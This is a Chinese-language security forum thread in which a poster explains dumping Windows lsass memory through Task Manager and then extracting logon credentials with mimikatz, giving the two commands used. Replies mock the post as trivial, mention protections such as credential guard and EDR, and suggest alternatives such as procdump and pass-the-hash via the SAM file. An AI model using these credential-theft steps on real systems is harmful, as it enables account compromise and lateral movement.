导航

dumphash

#1

使用task manager dumphash操作(非原創)

dump下來的文件位置如下,我們可以將此文件傳輸到我們的攻擊機

使用mimikatz將其解密

sekurlsa::minidump C:\lsass.DMP
sekurlsa::logonpasswords
2022-03-04
#2
不是原创你发原创区?而且你这样直接读lsass内存,在高版本有las和凭据保护,也读不了。碰edr直接死
2022-03-04
#3
回复 2# PYkiller
2022-03-04
#4
不是原创你发原创区?而且你这样直接读lsass内存,在高版本有las和凭据保护,也读不了。碰edr直接死 ...
PYkiller 发表于 2022-3-4 17:29 [img]https://www.t00ls.com/images/common/back.gif[/img]

師傅教訓的是,我以後注意,抱歉,第一條回復手抖了,,,這個是我在2019測試的。。。2022版本沒測試
2022-03-04
#5
这个也太水了吧...prodump,sqldumper这些都能dump lsass.exe的缓存然后还原,你这个还要可视化界面操作才行
2022-03-04
#6
回复 4# pr0sm
高版本你可以试试读sam文件,用来走hash传递攻击,也没必要抓明文
2022-03-05
#7
进来之前 我以为是啥呢
进来之后 这这这 ...
2022-03-05
#8
win下抓密码基操,对系统版本有要求,不是都可以抓到的
2022-03-07
#9
你是没啥东西发的了吗?这种等级的文章就别发出来丢人了,都是玩烂的东西